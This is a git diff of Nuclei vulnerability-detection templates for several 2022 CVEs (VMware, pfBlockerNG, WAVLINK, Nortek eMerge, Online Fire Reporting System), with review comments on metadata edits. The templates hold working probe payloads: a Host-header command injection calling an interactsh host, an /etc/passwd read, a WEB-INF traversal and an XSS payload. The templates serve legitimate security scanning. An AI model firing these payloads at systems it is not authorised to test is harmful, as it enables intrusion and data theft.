metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: title:"eMerge" - verified: "true" - tags: packetstorm,cve,cve2022,emerge,rce + tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol -requests: +http: - raw: - | @timeout: 15s 
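Review bot: The new reference `https://eg.linkedin.com/in/omar-1-hashem` in CVE-2022-31499.yaml is a researcher's profile page rather than an advisory or write-up, so it gives a triager nothing to act on and should be dropped from `reference:`; the same link is added to CVE-2022-31798.yaml in this commit. The hunk also replaces `verified: "true"` with the boolean `verified: true`, but the Online Fire Reporting templates touched later in the commit keep the quoted string, so the normalisation is only partial. The `raw:` request starts at the end of this hunk and continues outside it.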
@@ -32,7 +43,8 @@ requests: - type: dsl dsl: - duration>=7 - - contains(all_headers, "text/html") + - contains(header, "text/html") - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and +# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31656.yaml b/nuclei-templates/CVE-2022/CVE-2022-31656.yaml index d15ea19969..f77ae5c7be 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31656.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31656.yaml 
@@ -6,21 +6,33 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. reference: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd - https://www.vmware.com/security/advisories/VMSA-2022-0021.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31656 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 + epss-score: 0.75034 + epss-percentile: 0.98069 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: vmware + product: identity_manager shodan-query: http.favicon.hash:-1250474341 - verified: "true" - tags: cve,cve2022,vmware,lfi + tags: cve2022,cve,vmware,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml" @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
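Review bot: The `remediation:` text added to CVE-2022-31656.yaml, "ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations", is advice for whoever wrote the code, not for an operator running a VMware appliance; the actionable fix is the vendor advisory already in the references, e.g. `remediation: Apply the patches or workarounds published in VMSA-2022-0021.`. The `impact:` text describes file reads, which matches the `web.xml` request, but the description and `cwe-id: CWE-287` frame this as an authentication bypass, so the impact should say that the path reaches the resource without authentication. The new `cpe` names only `identity_manager:3.3.4` although the description covers three products, and the two ARPSyndicate links are aggregator repositories rather than primary sources.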
diff --git a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml b/nuclei-templates/CVE-2022/CVE-2022-31793.yaml deleted file mode 100644 index 23797e44cc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-31793 - -info: - name: muhttpd <=1.1.5 - Local Inclusion - author: scent2d - severity: high - description: | - muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. - reference: - - https://derekabdine.com/blog/2022-arris-advisory.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - - https://derekabdine.com/blog/2022-arris-advisory - - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31793 - cwe-id: CWE-22 - metadata: - verified: "true" - tags: cve,cve2022,network,muhttpd,lfi,unauth - -network: - - host: - - "{{Hostname}}" - - inputs: - - data: "47455420612F6574632F706173737764" - type: hex - - data: "\n\n" - - read-size: 128 - matchers: - - type: word - part: body - encoding: hex - words: - - "726f6f743a" - -# Enhanced by mp on 2023/01/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31798.yaml b/nuclei-templates/CVE-2022/CVE-2022-31798.yaml index e1dca30afe..63e878830a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31798.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31798.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series. reference: - https://packetstormsecurity.com/files/167992/ - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31798 + - https://eg.linkedin.com/in/omar-1-hashem + - https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31798 - cwe-id: CWE-79 + cwe-id: CWE-384 + epss-score: 0.00126 + epss-percentile: 0.46259 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: http.title:"eMerge" - verified: "true" - tags: cve2022,emerge,nortek,xss,packetstorm,cve + tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol -requests: +http: - method: GET path: - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E' @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 09/29/2022 +# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
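Review bot: CVE-2022-31798.yaml now carries `cwe-id: CWE-384` (session fixation) while the request still sends an `onerror=alert(document.domain)` payload, the tags keep `xss`, and the freshly added `impact:` and `remediation:` both describe an XSS, so the classification and the detection no longer tell the same story. If CWE-384 is what NVD assigns to this CVE it can stay, but then `impact:` should explain that the reflected XSS is the step that makes the session-fixation chain exploitable and the remediation should not call it "the XSS vulnerability". The LinkedIn profile link added to `reference:` is not an advisory and can be dropped. The matcher block continues outside the hunk.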
diff --git a/nuclei-templates/CVE-2022/CVE-2022-31814.yaml b/nuclei-templates/CVE-2022/CVE-2022-31814.yaml index e6b64fab53..4b923edec0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31814.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31814.yaml @@ -6,20 +6,33 @@ info: severity: critical description: | pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability. reference: - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html - https://github.com/EvergreenCartoons/SenselessViolence - https://nvd.nist.gov/vuln/detail/CVE-2022-31814 + - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31814 + cwe-id: CWE-78 + epss-score: 0.96552 + epss-percentile: 0.9952 + cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: - verified: "true" - tags: cve,cve2022,pfsense,pfblockerng,rce,oast + verified: true + max-request: 2 + vendor: netgate + product: pfblockerng + framework: pfsense + tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate -requests: +http: - raw: - |+ GET /pfblockerng/www/index.php HTTP/1.1 
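Review bot: The `remediation:` text added to CVE-2022-31814.yaml gives the fixed version as `>=2.1..4_27`, a double dot that is presumably meant to be `>=2.1.4_27` given the description says builds through 2.1.4_26 are affected; correct it before it is copied into reports, e.g. `Upgrade to a patched version of pfSense pfBlockerNG (>=2.1.4_27) to mitigate this vulnerability.`. The hunk also adds `max-request: 2`, which is right only if the `raw:` list that continues outside the hunk still holds exactly two requests.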
@@ -31,17 +44,16 @@ requests: Host: ' *; host {{interactsh-url}}; ' Accept: */* - req-condition: true unsafe: true + matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: dsl dsl: - 'contains(body_1, "GIF")' -# Enhanced by mp on 2022/10/06 + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" +# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31845.yaml b/nuclei-templates/CVE-2022/CVE-2022-31845.yaml index 10ffe5e7d4..332d5df030 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31845.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31845.yaml @@ -6,6 +6,10 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 
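Review bot: The `@@ -31` hunk of CVE-2022-31814.yaml removes `req-condition: true` while the DSL matcher still references `body_1`; newer nuclei engines appear to enable request conditions implicitly when suffixed variables are used, but on an older engine the matcher would silently stop seeing the first response, so a comment such as `# body_1 relies on implicit req-condition; confirm the minimum engine version` beside the dsl line would record the assumption. Adding `matchers-condition: and` is the right call, since either the GIF fingerprint or a DNS callback alone would be a weak signal.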
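Review bot: In CVE-2022-31845.yaml the reference list shown as context still points to `cvename.cgi?name=CVE-2022-30489`, a different CVE than the template's `cve-id`, and the same link appears in CVE-2022-31846.yaml; since this commit is rewriting both info blocks it should fix or drop that entry. The added `impact:` claims login credentials are exposed, which goes beyond the description's "sensitive router information" — keep it to what the cited source states.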
@@ -15,12 +19,18 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31845 cwe-id: CWE-668 + epss-score: 0.00874 + epss-percentile: 0.80606 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - raw: - | @timeout: 10s @@ -39,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31846.yaml b/nuclei-templates/CVE-2022/CVE-2022-31846.yaml index 985a50689b..fa1dde8f5b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31846.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31846.yaml 
@@ -6,21 +6,33 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 - https://nvd.nist.gov/vuln/detail/CVE-2022-31846 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31846 cwe-id: CWE-668 + epss-score: 0.00874 + epss-percentile: 0.80651 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/live_mfg.shtml" @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31847.yaml b/nuclei-templates/CVE-2022/CVE-2022-31847.yaml index d424060031..145a1dea6d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31847.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-31847.yaml @@ -6,6 +6,10 @@ info: severity: high description: | WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 @@ -13,13 +17,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31847 - cwe-id: CWE-668 + cwe-id: CWE-425 + epss-score: 0.01285 + epss-percentile: 0.84308 + cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn579x3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" @@ -37,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31854.yaml b/nuclei-templates/CVE-2022/CVE-2022-31854.yaml index b8f049e1f2..bbee69b1c5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31854.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31854.yaml 
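Review bot: CVE-2022-31847.yaml moves from `cwe-id: CWE-668` to `CWE-425` while the sibling WAVLINK templates CVE-2022-31845 and CVE-2022-31846 in the same commit stay on CWE-668 for the same class of unauthenticated information exposure; if CWE-425 is taken from the NVD record for this CVE that is fine, but a one-line justification beside the key or in the commit message would save the next reader from re-checking. The `impact:` text again asserts user credentials are exposed, which the description does not state.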
@@ -6,6 +6,8 @@ info: severity: high description: | Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Codoforum. reference: @@ -13,20 +15,21 @@ info: - https://codoforum.com - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc - https://nvd.nist.gov/vuln/detail/CVE-2022-31854 + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-31854 cwe-id: CWE-434 - epss-score: 0.08519 - epss-percentile: 0.93791 + epss-score: 0.17108 + epss-percentile: 0.95958 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: codologic product: codoforum - tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive + tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic http: - raw: @@ -89,4 +92,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true -# digest: 490a00463044022010d45fccfc97129aa6bfe22f0299ed3191bd2cb227062c258ad6ab3f14f105950220313e0ff56633438f2fc0b5fbbe0812fc864fdfede305f69c6767cedb98082308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-31879.yaml b/nuclei-templates/CVE-2022/CVE-2022-31879.yaml index c086e79327..f475a1cadb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31879.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31879.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.05592 - epss-percentile: 0.92459 + epss-score: 0.05519 + epss-percentile: 0.9247 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Dashboard")' condition: and -# digest: 4b0a0048304602210083e50e077d56b4759480f5128ff203675c58bc748a3aa76f5e294374b53e1fb8022100b4ed3a111bdf8585f8979b3f84a2b4916dad6f516e74ddd5cf732207df7ca334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31974.yaml b/nuclei-templates/CVE-2022/CVE-2022-31974.yaml index fd28c53a74..70990c80c4 100644 
--- a/nuclei-templates/CVE-2022/CVE-2022-31974.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31974.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31974 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01429 + epss-percentile: 0.85199 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fb2f79e8fa6e2919961c34ea85b171532f2e3415685ef56f50e7e8e51cdc1e2022100c623b8d8f6895e7ebe9e536b4a8a76b507e4609292dcfec3df604a1a76e6ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd024201d59f3b88ebf784aa61907ba5542a05e208b9e3de8c8bc7b30656f3c3022100f7aed5dfec5f88ed4297bc1f99e947e0c801b63bbf53a7dc7c1e655edb49ebac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31975.yaml b/nuclei-templates/CVE-2022/CVE-2022-31975.yaml index c0f26fd273..58ef41e98d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31975.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31975.yaml 
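Review bot: CVE-2022-31974.yaml keeps `verified: "true"` as a quoted string (context in the `@@ -17` hunk), as do CVE-2022-31975 through CVE-2022-31982 further down, while the same commit switches CVE-2022-31499, CVE-2022-31656 and CVE-2022-31814 to the boolean `verified: true`; since each of these info blocks is being rewritten anyway, normalising to `verified: true` here would leave the repository with a single convention. The eight new `impact:` paragraphs are identical boilerplate, which is acceptable for sibling SQLi findings, but they would be more useful if each named the injection point already given in its `description:`.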
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31975 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019fdb7784e13d9546046105563da76fa09da4a15068fa8abd82d21e8ae3226fd022100dca782f9338bf42e5c9e7098e1d65643de4c46281fb7942345d90df8607b6e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009910d6652352aff0eaac88c2b579c400a86a5f3ec6e122e5ac431a9d2f6079e2022100f750cb7ea36162240a1e8aef0aaebdc5a12c7e58e593b3b3ad12e780a227b3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31976.yaml b/nuclei-templates/CVE-2022/CVE-2022-31976.yaml index 5981c810d6..d35e7b48bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31976.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31976.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.02036 + epss-percentile: 0.87769 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a0047304502207100223526bdd43e418a135178fd12bc3456ca2e242196883fbc5cac7e66b2d2022100f21f001de22deb1056d7e32ba9eae114f904eec510d2c67f046c815372d0a977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31977.yaml b/nuclei-templates/CVE-2022/CVE-2022-31977.yaml index 3acae51d25..f1d882f18c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31977.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31977.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.01192 + epss-percentile: 0.83594 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a00473045022100bbc45fe8e2c62d7be246cac1bf71061287a7264a7f94a251d6b64927017c824502207bdfced636893112385f58a94bdc9ce0bcebe8094796989974733e8b0ecbb238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31978.yaml b/nuclei-templates/CVE-2022/CVE-2022-31978.yaml index e71114fefa..7130952dc8 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31978.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31978.yaml 
